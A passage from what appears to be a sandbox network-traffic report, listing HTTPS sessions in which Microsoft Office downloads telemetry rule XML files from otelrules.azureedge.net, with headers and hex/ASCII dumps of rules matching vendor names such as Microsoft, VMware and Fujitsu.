                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        16192.168.2.54972313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:22 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:22 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 3b9707c2-c01e-0082-5508-36af72000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142522Z-r178fb8d765j7nnvhC1DFW39w400000001p000000000gqxp
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:22 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        17192.168.2.54972613.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:22 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:23 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 99102dbc-c01e-0066-43c1-2ca1ec000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142523Z-16547b76f7fwvr5dhC1DFW2c940000000kng00000000der9
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        18192.168.2.54972713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:22 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:23 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 183719b9-d01e-00a1-43c3-2c35b1000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142523Z-16547b76f7fwvr5dhC1DFW2c940000000kqg000000008e69
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        19192.168.2.54972913.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:23 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 464
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 0b41d791-c01e-0079-140b-36e51a000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142523Z-1749fc9bdbdht5mthC1DFWph9000000002n000000000g8td
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        20192.168.2.54972813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:23 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: c860b0c2-d01e-007a-2fa3-34f38c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142523Z-r178fb8d765zlhnthC1DFWvdu0000000015g00000000bxsz
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        21192.168.2.54973013.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:23 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 7f7db364-701e-005c-2f05-2dbb94000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142523Z-16547b76f7fcrtpchC1DFW52e80000000kug00000000999q
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        22192.168.2.54973113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:24 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: e9ec46b7-301e-0099-3c15-366683000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142524Z-1749fc9bdbdpg69chC1DFWhecg00000002kg000000004tu6
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        23192.168.2.54973213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:24 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 849cffad-401e-008c-4c40-3686c2000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142524Z-16547b76f7fp6mhthC1DFWrggn0000000kyg0000000035yu
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        24192.168.2.54973313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:24 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                                                                                                                                                                                                        Connection: close
